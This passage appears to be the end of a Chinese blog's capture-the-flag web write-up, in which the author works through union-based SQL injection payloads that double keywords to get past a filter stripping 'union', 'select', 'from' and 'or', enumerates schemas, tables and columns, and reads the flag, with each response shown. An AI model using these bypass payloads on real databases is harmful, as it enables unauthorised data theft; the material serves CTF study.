<p>再动动脑子:<br>123’ ununionion seselectlect 1,2,table_name frfromom infoorrormation_schema.tables;#<br>Your password is ‘ALL_PLUGINS’    成功<br>-1’ ununionion seleselectct 1,2,column_name frofromm infoorrormation_schema.columns;#<br>Your password is ‘PLUGIN_NAME’<br>-1’ ununionion seleselectct 1,2,PLUGIN_NAME frofromm ALL_PLUGINS;#<br>Table ‘geek.ALL_PLUGINS’ doesn’t exist    ？？？</p>
<p>看了看wp，发现忘了查询schema<br>-1’ ununionion seleselectct 1,2,schema_name frofromm infoorrormation_schema.schemata;#       &#x2F;&#x2F;注意这里是information_schema.schemata<br>Your password is ‘information_schema<br>-1’ ununionion seleselectct 1,2,group_concat(schema_name) frofromm infoorrormation_schema.schemata;#<br>Your password is ‘information_schema,mysql,performance_schema,test,ctf,geek’<br>-1’ ununionion seleselectct 1,2,group_concat(table_name) frofromm infoorrormation_schema.tables whewherere table_schema&#x3D;’ctf’;#<br>Your password is ‘Flag’<br>-1’ ununionion seleselectct 1,2,group_concat(column_name) frofromm infoorrormation_schema.columns whewherere table_name&#x3D;’Flag’;#<br>Your password is ‘flag’<br>-1’ ununionion seleselectct 1,2,flag frofromm ctf.Flag;#<br>得到flag</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                      <a class="hover-with-bg" href="/categories/CTF/%E5%9F%BA%E7%A1%80/">基础</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/web/">web</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/26/%E6%88%98%E6%96%97%E8%AE%B0%E5%BF%86/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">战斗记忆</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/07/%E9%97%AD%E5%8C%85%E7%89%B9%E6%80%A7%E7%9A%84%E4%B8%80%E4%BA%9B%E7%94%A8%E9%80%94-%E6%8A%84/">
                        <span class="hidden-mobile">python闭包特性(抄)&&python函数装饰器</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
